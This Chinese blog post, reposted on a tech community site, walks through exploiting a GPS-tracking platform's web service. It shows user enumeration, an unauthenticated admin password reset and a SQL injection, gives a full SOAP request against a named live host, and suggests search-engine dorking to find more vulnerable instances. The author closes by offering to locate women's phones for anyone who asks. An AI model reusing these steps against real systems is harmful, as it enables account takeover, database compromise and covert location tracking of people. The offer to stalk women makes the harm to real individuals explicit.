专栏首页晨星先生的自留地我是如何通过手机定位妹子的位置的

我是如何通过手机定位妹子的位置的

晚上复习了一晚上的数据结构,还和贻炼兄弟聊了一会儿~~~ 实在没时间再去做php的项目了,反正中小型的cms都能审计出漏洞了,也就无所谓开发的东西多漂亮。不过做事情还是要有匠心,开发多和贻炼同学学习。哈哈~~

关于前段时间wooyun爆出的GPS平台漏洞,其实这篇文章很早就写了。只不过一直忙,都没有时间发在博客,晚上刚好发出来好了。

Wooyun只是介绍,而我们这里说的是利用…

我们挑一个平台吧。这是同一套系统,通杀的。想玩更多的自己google hack构造。

首先我们访问下:http:xxx.xxx//ajax/UsersAjax.asmx

是不是看到很熟悉的东西。其实之前看到人家说,我就在想是不是和正方的一样,接口处问题了。结果还真是。。

随便找一个平台,我们通过抓取asmx的包。Searchusers这里可以通过查询用户ID

改变<userID> 还有<Username>的int 和string即可。

返回效果如下

查询到管理员属于哪个ID,这里还有一个利用。密码初始化

接下来我们把包替换成InitUserPassword(初始化密码)里面的请求同时把ID换位2

就可以初始化管理员密码了,默认密码自己猜。。

经过反复测试,如果是数据就是失败,返回的请求为数字一般是成功。

然后searchID不仅仅有查询的功能,还有一个搜索型注入,抓取他的包。

  • POST /ajax/UsersAjax.asmx HTTP/1.1
  • Host: www.aika168.com
  • Content-Type: text/xml; charset=utf-8
  • Content-Length: length
  • SOAPAction: "http://tempuri.org/SearchUsers"
  • <?xml version="1.0"encoding="utf-8"?>
  • <soap:Envelopexmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  • <soap:Body>
  • <SearchUsersxmlns="http://tempuri.org/">
  • <UserID>2</UserID>
  • <UserName>a*</UserName>
  • </SearchUsers>
  • </soap:Body>
  • </soap:Envelope>

效果如下图

sqlmap测试,并且几乎都是sa权限。接下来不玩服务器了,有需要定位妹子的可以找我哈。

本文分享自微信公众号 - 晨星先生(MoXuanIT),作者:vaf

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2016-07-24

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • oreint db 远程代码执行漏洞

    lonelyvaf
  • 黑客技能训练:攻破MrRobot

    lonelyvaf
  • 面试中遇到的坑之mysql注入入门

    lonelyvaf
  • Linux运维工程师必备的80个监控工具全集(上)

    随着互联网行业的不断发展,各种监控工具多得不可胜数。这里列出网上最全的监控工具。让你可以拥有超过80种方式来管理你的机器。

    拓荒者
  • Linux运维工程师必备的80个监控工具全集(上)

    随着互联网行业的不断发展,各种监控工具多得不可胜数。这里列出网上最全的监控工具。让你可以拥有超过80种方式来管理你的机器。

    马哥linux运维
  • Linux运维工程师必备的80个监控工具全集(上)

    随着互联网行业的不断发展,各种监控工具多得不可胜数。这里列出网上最全的监控工具。让你可以拥有超过80种方式来管理你的机器。 在本文中,我们主要包括以下方面: 命...

    小小科
  • 专栏:004:网页下载器的使用

    谢伟
  • Spring5 源码学习 (4) refresh 方法

    接上文 Spring5源码分析(三)refresh方法 中已经讲到了refresh()中的postProcessBeanFactory(beanFactory)...

    Coder小黑
  • Nodejs进阶:http核心模块简介

    本文作者:IMWeb 陈映平 原文出处:IMWeb社区 未经同意,禁止转载 http模块概览 大多数nodejs开发者都是冲着开发web server...

    IMWeb前端团队
  • Spring入门(一)——IOC

    Inversion of Control,减低计算机代码间的耦合度,对象的创建交给外部容器完成,不用再new了

    晚上没宵夜

扫码关注云+社区

领取腾讯云代金券